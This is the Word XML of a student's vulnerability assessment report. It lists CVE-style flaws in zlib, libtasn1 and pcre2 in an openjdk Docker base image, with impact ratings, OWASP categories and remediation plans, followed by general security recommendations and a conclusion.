            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5D7186" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Plan for updating the base image post-semester to a version without this vulnerability. Monitor for updates and patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65646F72" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc168573800"/>
      <w:r>
        <w:t>zlib/zlib1g - Out-of-bounds Write</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="591466BE" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Base Image: openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="797C4E9D" w14:textId="77777777" w:rsidTr="001C5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EB66A4D" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3718FFAA" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5514E19E" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D204178" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="011C7C7E" w14:textId="77777777" w:rsidTr="001C5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0E0DBD1" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>This vulnerability can lead to out-of-bounds write, potentially allowing for code execution or crashing the application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5DA14A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C016ED8" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0641F0" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Plan for updating the base image post-semester to a version without this vulnerability. Monitor for updates and patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CE09B41" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc168573801"/>
      <w:r>
        <w:t>libtasn1-6 - Off-by-one Error</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0FB0F046" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Base Image: openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="66AB7298" w14:textId="77777777" w:rsidTr="001C5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1FE5C57" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66291DD7" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="526AAFB3" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E343C3" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="7575B875" w14:textId="77777777" w:rsidTr="001C5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A581A7E" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">An off-by-one error that could </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>result in buffer overflows, leading to potential code execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FD357C" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF98422" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4EB4AA" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Plan for updating the base image post-</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>semester to a version without this vulnerability. Monitor for updates and patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="403248CE" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc168573802"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pcre2/libpcre2-8-0 - Out-of-bounds Read</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="641FDAAE" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Base Image: openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="7A7F18B9" w14:textId="77777777" w:rsidTr="001C5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51528DE" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07CD9675" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7511B6C1" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439D096B" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="3EEF0560" w14:textId="77777777" w:rsidTr="001C5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8E45CA7" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>This vulnerability can cause out-of-bounds read, potentially leading to information disclosure or crashes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC35ECA" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4118496B" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC56636" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Plan for updating the base image post-semester to a version without this vulnerability. Monitor for updates and patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72AE12F5" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc168573803"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1B1A2E1A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc168573804"/>
      <w:r>
        <w:t>Immediate Actions:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="547E4200" w14:textId="0A6DA6C2" w:rsidR="007C3F4F" w:rsidRDefault="00000000" w:rsidP="007C3F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Update Spring Web MVC and Spring Web Dependencies</w:t>
      </w:r>
      <w:r w:rsidR="007C3F4F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE956DF" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc168573805"/>
      <w:r>
        <w:t>Post-Semester Actions:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="65B699ED" w14:textId="003F50DD" w:rsidR="00572BDB" w:rsidRDefault="00000000" w:rsidP="00B95AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plan for Updating the JDK and Docker Image Dependencies: Address the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities by upgrading the base image and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615420B8" w14:textId="77777777" w:rsidR="007C3F4F" w:rsidRDefault="007C3F4F" w:rsidP="007C3F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement CSRF Protection and Input Sanitization: Add CSRF tokens to forms and sanitize all inputs to prevent XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D92363" w14:textId="32442434" w:rsidR="007C3F4F" w:rsidRDefault="007C3F4F" w:rsidP="007C3F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Review and Validate URL Redirections: Ensure all URL parameters used for redirections are validated and sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C0F1D" w14:textId="005ED686" w:rsidR="00572BDB" w:rsidRDefault="00000000" w:rsidP="00B95AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Regularly Scan Dependencies: Continuously monitor for new vulnerabilities in project dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C823D" w14:textId="16BE4921" w:rsidR="00572BDB" w:rsidRDefault="00000000" w:rsidP="00B95AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement a Security Review Process: Regularly review and update security configurations and dependency versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD0233" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc168573806"/>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="79478322" w14:textId="2189E877" w:rsidR="007C3F4F" w:rsidRDefault="007C3F4F">
      <w:r>
        <w:t xml:space="preserve">All of the mentioned vulnerabilities require action for prevention as soon as possible, both the Maven dependencies and the Docker images. For now, I will focus on the easier to fix changes, like updating the dependencies, and the vulnerabilities related to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openjdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> image will be left like that until the end of the semester, because of the risk of costing too much time in the end of the semester.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4095C3" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This comprehensive assessment highlights the need for continuous monitoring and timely updates to maintain a secure development environment.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00572B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2D52D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7D82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53D69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61DC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73AF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F03A7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401F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10D8A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346245">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="431704698">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="262151243">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2088065998">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="269515675">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1029836917">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="87850425">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="648247188">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="261882335">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1528786536">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="420301922">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1864243383">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="313220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5827"/>
    <w:rsid w:val="002527FA"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00572BDB"/>
    <w:rsid w:val="00590F8E"/>
    <w:rsid w:val="00620268"/>
    <w:rsid w:val="00653AF3"/>
    <w:rsid w:val="007C3F4F"/>
    <w:rsid w:val="008A42C2"/>
    <w:rsid w:val="008D6E19"/>
    <w:rsid w:val="009F0D41"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AD0A39"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B705E0"/>
    <w:rsid w:val="00B95AF5"/>
    <w:rsid w:val="00CA7D46"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D97626"/>
    <w:rsid w:val="00DA30E1"/>
    <w:rsid w:val="00F050A8"/>
    <w:rsid w:val="00F70C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B0CED"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{B125ED72-641D-4FB0-B983-EB63A124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D4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C5827"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C5827"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C5827"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C5827"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001C58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1C582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C58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Kaloyan Preslavski</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2024-06-06T12:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-06T11:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-08T18:02:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>